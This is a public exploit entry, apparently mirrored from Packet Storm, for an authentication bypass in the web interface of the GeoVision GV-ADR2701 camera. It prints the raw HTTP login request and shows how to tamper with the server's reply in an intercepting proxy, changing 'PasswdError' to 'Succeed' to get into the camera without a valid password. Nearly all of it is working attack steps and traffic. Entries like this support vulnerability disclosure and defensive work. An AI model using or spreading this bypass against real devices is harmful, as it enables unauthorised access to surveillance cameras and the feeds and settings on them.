Exploit for GeoVision Camera GV-ADR2701 Authentication Bypass

## https://sploitus.com/exploit?id=PACKETSTORM:171624
# Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass   
# Device name: GV-ADR2701  
# Date: 26 December , 2020  
# Exploit Author: Chan Nyein Wai  
# Vendor Homepage: https://www.geovision.com.tw/  
# Software Link: https://www.geovision.com.tw/download/product/  
# Firmware Version: V1.00_2017_12_15  
# Tested on: windows 10  
  
# Exploitation  
1. Capture The Login Request with burp, Do intercept request to response  
  
Request:  
```  
PUT /LAPI/V1.0/Channel/0/System/Login HTTP/1.1  
Host: 10.10.10.10  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0)  
Gecko/20100101 Firefox/84.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Authorization: Basic dW5kZWZpbmVkOnVuZGVmaW5lZA==  
Content-Length: 46  
Origin: http://10.10.10.10  
Connection: close  
Referer: http://10.10.10.10/index.htm?clientIpAddr=182.168.10.10&IsRemote=0  
Cookie: isAutoStartVideo=1  
  
{"UserName":"admin","Password":"0X]&0D]]05"}  
```  
  
2. The following is the normal response when you login to the server.  
```  
HTTP/1.1 200 Ok  
Content-Length: 170  
Content-Type: text/plain  
Connection: close  
X-Frame-Options: SAMEORIGIN  
  
{  
"Response": {  
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",  
"CreatedID": -1,  
"StatusCode": 460,  
"StatusString": "PasswdError",  
"Data": "null"  
}  
}  
```  
  
By editing the response to the following, you can successfully log in to  
the web application.  
  
```  
HTTP/1.1 200 Ok  
Content-Length: 170  
Content-Type: text/plain  
Connection: close  
X-Frame-Options: SAMEORIGIN  
  
{  
"Response": {  
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",  
"CreatedID": -1,  
"StatusCode": 0,  
"StatusString": "Succeed",  
"Data": "null"  
}  
}  
```